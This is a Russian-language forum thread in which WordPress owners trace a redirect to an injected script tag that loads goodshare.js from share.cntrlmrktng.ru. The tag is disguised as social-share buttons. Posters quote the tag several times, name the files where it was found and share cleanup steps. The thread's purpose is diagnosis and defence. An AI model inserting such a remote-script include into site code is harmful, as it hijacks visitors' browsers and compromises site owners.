Sign in to follow this  
Followers 0
Вася

Непонятный переход

29 posts in this topic

Здравствуйте. Такая проблема, при переходе на сайт eragames.biz перекидывает на другие сайты . вот скрины http://eragames.biz/bezymjannyj.png, http://eragames.biz/maiprt.png Помогите кто в курсе что это? 

Share this post


Link to post
Share on other sites

Javascript редирект. В коде страницы:
 

<script type="text/javascript" charset="UTF-8" async="async" src="http://share.cntrlmrktng.ru/1.1/goodshare.js"></script>

Именно в этом подгружаемом скрипте и прописан редирект. Сайт, как я понял, ваш? Просто удалите эту строчку из кода шаблона, и успокойтесь=)

pawok and Вася like this

Share this post


Link to post
Share on other sites

Javascript редирект. В коде страницы:

 

<script type="text/javascript" charset="UTF-8" async="async" src="http://share.cntrlmrktng.ru/1.1/goodshare.js"></script>

Именно в этом подгружаемом скрипте и прописан редирект. Сайт, как я понял, ваш? Просто удалите эту строчку из кода шаблона, и успокойтесь=)

 

 а он во всех страницах сайта есть или как? что то не могу найти 

Share this post


Link to post
Share on other sites

и успокойтесь=)

Не соглашусь. Успокоиться стоит тогда, когда узнаете из-за чего она там появилась. Меняйте все пароли (фтп, админка, панель и тд).

serjin likes this

Share this post


Link to post
Share on other sites

Не соглашусь. Успокоиться стоит тогда, когда узнаете из-за чего она там появилась. Меняйте все пароли (фтп, админка, панель и тд).

 

Похоже на новую, пока малоизвестную дыру. Сегодня столкнулся с тем же, на одном из клиентских сайтов. 

Код, маскирующийся под кнопки социальных сетей:

<script type="text/javascript" charset="UTF-8" async="async" src="http://share.cntrlmrktng.ru/1.1/goodshare.js"></script>
<div id="goodshare" themecolor="color" themestyle="roundedge" socialnetworks="vkontakte,ok,twitter,googleplus,mailru,yazakladki,email" iconsize="37" buttonfixed="left" viewcounter="true"></div>

был прописан в index.php темы, а также дополнительно как текстовый виджет.

 

Пока, профилактически, проблема решена чистой установкой последней ВП, а также удалением стандартных тем ВП. Естественно, все плагины обновлены. Внесены блокировки от SQL и XSS атак.

Griffin likes this

Share this post


Link to post
Share on other sites

логи сервера бы глянуть, а там и дырку найти не проблема

Share this post


Link to post
Share on other sites

логи сервера бы глянуть, а там и дырку найти не проблема

В том то и дело, что это произошло не сегодня и не вчера.

Share this post


Link to post
Share on other sites

Не соглашусь. Успокоиться стоит тогда, когда узнаете из-за чего она там появилась. Меняйте все пароли (фтп, админка, панель и тд).

Да-да, с успокоением я что-то погорячился. Просто почему-то подумалось, что владелец сам вшил этот код, устанавливая "кнопки соц. сетей" с сайта cntrlmrktng.ru

Share this post


Link to post
Share on other sites

Тоже самое: 

<script type="text/javascript" charset="UTF-8" async="async" src="http://share.cntrlmrktng.ru/1.1/goodshare.js"></script>

нашла в файле footer.inc.php. и штука эта сидит именно в теме сайта

удалила - все Ок, но...

до этого поменяла все пароли на всех уровнях... включая админки сайтов

теперь вот сижу и сканирую все пхпешные файлы. ну и на всякий случай джейесные.

 

Спасибо, ребят, без вас бы быстро не сообразила бы. 

Share this post


Link to post
Share on other sites

Недели полторы назад в логах видел, кто то папку с плагинами сканировал, какие установлены. Так сканировали активно, что нагрузили хостинг. Может и вас через плагины подломили?

Share this post


Link to post
Share on other sites

Недели полторы назад в логах видел, кто то папку с плагинами сканировал, какие установлены. Так сканировали активно, что нагрузили хостинг. Может и вас через плагины подломили?

сканируют софтом, у меня та же беда, но нагрузки незначительные от этого, хотя ежедневно перебирают адреса. Очень много обращений идет на выяснение движка сайта в основном ищут WP, и доступ к админке, кто то ищет бэкапы сайта, кто то сторонние плагины в основном загрузчики, видать есть в них дыры, по крайней мере просто так бы не искали. Но так же есть и индивидуалы которые просто хотят узнать на чем стоит сайт, так же ищут различные зацепки.

Share this post


Link to post
Share on other sites

сканируют софтом, у меня та же беда, но нагрузки незначительные от этого, хотя ежедневно перебирают адреса. Очень много обращений идет на выяснение движка сайта в основном ищут WP, и доступ к админке, кто то ищет бэкапы сайта, кто то сторонние плагины в основном загрузчики, видать есть в них дыры, по крайней мере просто так бы не искали. Но так же есть и индивидуалы которые просто хотят узнать на чем стоит сайт, так же ищут различные зацепки.

Понимаю, что автоматически сканируют. Думаю, может дыра какая то стала известна и сканируют массово.

Share this post


Link to post
Share on other sites

Понимаю, что автоматически сканируют. Думаю, может дыра какая то стала известна и сканируют массово.

Так и есть, просто так перебирать сайты не будут, это затратно. А дыры есть везде, просто в популярных системах знают где и в чем их искать. Может даже банально собирают базу сайтов на WP, потом выпускают какой то полезный сторонний плагин с дырой и там уже пошло поехало.

Share this post


Link to post
Share on other sites

Здравствуйте! У меня проблема, при переходе на сайт salex-lcc.com.ua, перебрасывает на сайт http: //popular-psychology.ru/

Total Commander пытался найти

http://share.cntrlmrktng.ru/1.1/goodshare.js

http://mc.yandex.ru/watch/27154544

http: //popular-psychology.ru/

Ничего не вышло.

Сама проблема возникла 14.11.2015 с утра.

Восстанавливал со своих бэкапов за 27.10.2015, также с бэкапа хостинга 01.10.2015, ничего не помогло.

Проверял на вирусы, нечего не нашло.

Служба поддержки хостинга не знает, что и посоветовать.

Вот еще не могу разобраться, я не могу зайти на сайт с рабочего компьютера, также с компьютера пользователя, но вот с домашнего все замечательно работает.

Чистил кэш браузера, и кэш сайта. Все тоже самое.

Share this post


Link to post
Share on other sites

Здравствуйте! У меня проблема, при переходе на сайт salex-lcc.com.ua, перебрасывает на сайт http: //popular-psychology.ru/

Total Commander пытался найти

http://share.cntrlmrktng.ru/1.1/goodshare.js

http://mc.yandex.ru/watch/27154544

http:/ /popular-psychology.ru/

Ничего не вышло.

Сама проблема возникла 14.11.2015 с утра.

Восстанавливал со своих бэкапов за 27.10.2015, также с бэкапа хостинга 01.10.2015, ничего не помогло.

Проверял на вирусы, нечего не нашло.

Служба поддержки хостинга не знает, что и посоветовать.

Вот еще не могу разобраться, я не могу зайти на сайт с рабочего компьютера, также с компьютера пользователя, но вот с домашнего все замечательно работает.

Чистил кэш браузера, и кэш сайта. Все тоже самое.

Ищите не в файлах, а в бд

Share this post


Link to post
Share on other sites

Здравствуйте! У меня проблема, при переходе на сайт salex-lcc.com.ua, перебрасывает на сайт http: //popular-psychology.ru/

 

Я вижу, Вы нашли проблему. Поделитесь где лежала строчка?

Share this post


Link to post
Share on other sites

сканируют софтом, у меня та же беда, но нагрузки незначительные от этого, хотя ежедневно перебирают адреса. Очень много обращений идет на выяснение движка сайта в основном ищут WP, и доступ к админке, кто то ищет бэкапы сайта, кто то сторонние плагины в основном загрузчики, видать есть в них дыры, по крайней мере просто так бы не искали. Но так же есть и индивидуалы которые просто хотят узнать на чем стоит сайт, так же ищут различные зацепки.

 

Вот как себя защитить? Подскажите рекрутеру, у которого хобби сайтики-визитки делать :)

Share this post


Link to post
Share on other sites

Коллеги, давайте вычислим вредоносный плагин?

Столкнулся с аналогичной проблемой. В файл шаблона поста был внедрен вредоносный ява-скрипт, ведущий на ****share.cntrlmrktng.ru/1.1/goodshare.js****

 

Вредоносный код с помощью этого форума вычислил у удалил. После этого обнаружил подозрительный плагин, который я сам не устанавливал WP SuperCache (в деактивированном состоянии). Поэтому просто удаление вредоносной строчки кода не помогло. Пришлось удалить кеширующий плагин вместе со всеми сгенеренными им данными.

 

Как зараза ко мне пролезла пока не вычислил. Предлагаю всем пострадавшим опубликовать на форме список используемых плагинов и тем wordpress, чтобы дедуктивным методом вычислить код, повлекший за собой заражение сайта вирусом.

 

Начну с себя.

Плагины:

  • Akismet
  • All In One SEO Pack
  • Alpine PhotoTile for Instagram
  • amrshortcode any widget
  • cforms2
  • Contact Form 7
  • Easy Post View Counter
  • HyperComments
  • Kento Post View Counter
  • Lightbox Plus Colorbox
  • Мета слайдер
  • qTranslate
  • Quick Shop
  • QuickShop Updater
  • RusToLat
  • Skype Online Status
  • WordPress Backup to Dropbox
  • WP-location-tracking
  • Список страниц

Активная тема: Hueman

Share this post


Link to post
Share on other sites

Коллеги, давайте вычислим вредоносный плагин?

Столкнулся с аналогичной проблемой. В файл шаблона поста был внедрен вредоносный ява-скрипт, ведущий на ****share.cntrlmrktng.ru/1.1/goodshare.js****

 

Вредоносный код с помощью этого форума вычислил у удалил. После этого обнаружил подозрительный плагин, который я сам не устанавливал WP SuperCache (в деактивированном состоянии). Поэтому просто удаление вредоносной строчки кода не помогло. Пришлось удалить кеширующий плагин вместе со всеми сгенеренными им данными.

 

Как зараза ко мне пролезла пока не вычислил. Предлагаю всем пострадавшим опубликовать на форме список используемых плагинов и тем wordpress, чтобы дедуктивным методом вычислить код, повлекший за собой заражение сайта вирусом.

 

Начну с себя.

Плагины:

  • Akismet
  • All In One SEO Pack
  • Alpine PhotoTile for Instagram
  • amrshortcode any widget
  • cforms2
  • Contact Form 7
  • Easy Post View Counter
  • HyperComments
  • Kento Post View Counter
  • Lightbox Plus Colorbox
  • Мета слайдер
  • qTranslate
  • Quick Shop
  • QuickShop Updater
  • RusToLat
  • Skype Online Status
  • WordPress Backup to Dropbox
  • WP-location-tracking
  • Список страниц

Активная тема: Hueman

а в каком именно файле был записан ява скрипт?

Share this post


Link to post
Share on other sites

Друзья, я вот что нашла:

*******

 

И там вот что:

"Здравствуйте!

Если вы обнаружили, что с вашего сайта идёт редирект сюда, это НЕ ЗНАЧИТ, что ваш сайт взломали.

Это значит, что на вашем сайте есть предустановленный, ведущий на несуществующий уже сервис социальных кнопок cntrlmrktng.ru

Этот домен был месяц назад просрочен владельцами данного сервиса и он попал на биржу доменов в свободную продажу.
Там я его выбрал среди тысяч других и купил для своего проекта. Что это был за домен и кому принадлежал я понятия не имел.

После чего вдруг я начал получать множество жалоб и, даже, угроз со стороны владельцев различных сайтов.
Якобы я крутой хакер и взломал их сайт.
На самом деле не хотел никому зла, а причина различных глюков был злополучный скрипт, ведущий уже на мой cntrlmrktng.ru

Я пытался связаться с владельцами этого сервиса и вернуть им домен, но они не отвечают. Возможно, эта организация уже не работает.
Жаль, что они вот так подставили тысячи пользователей своих кнопок.

Теперь к делу:

Всё просто. Чтобы устранить проблему, удалите с сайта всё, что связано с сервисами типа Share Buttons.
В вордпрессе это плагин кнопок соцсетей, скорее всего. 
Может быть такая строчка в коде: <script charset="UTF-8" type="text/javascript" src="http:// share.cntrlmrktng.ru/1.1/goodshare.js"></script>

Если вы не являетесь администратором сайта, то прошу попытаться связаться с ним и дать ссылку на это сообщение.

 

Всем добра!"

 

Может и правда мы сами виноваты? ХЗ

Edited by Воланд
Активная ссылка
Санитар likes this

Share this post


Link to post
Share on other sites
Всем добра!"

 

Может и правда мы сами виноваты? ХЗ

Мадам, я вас продам, куплю конфет, а вам не дам.

И к чему ваше последнее сокращение?

А еще и дама, хотя я сомневаюсь.

Еще раз увижу вашу пошлятину - смою в унитаз!!!

Share this post


Link to post
Share on other sites

Мадам, я вас продам, куплю конфет, а вам не дам.

И к чему ваше последнее сокращение?

А еще и дама, хотя я сомневаюсь.

Еще раз увижу вашу пошлятину - смою в унитаз!!!

 

Саш, ну ты чего..это ж спам  :D

Griffin likes this

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0

  • Recently Browsing   0 members

    No registered users viewing this page.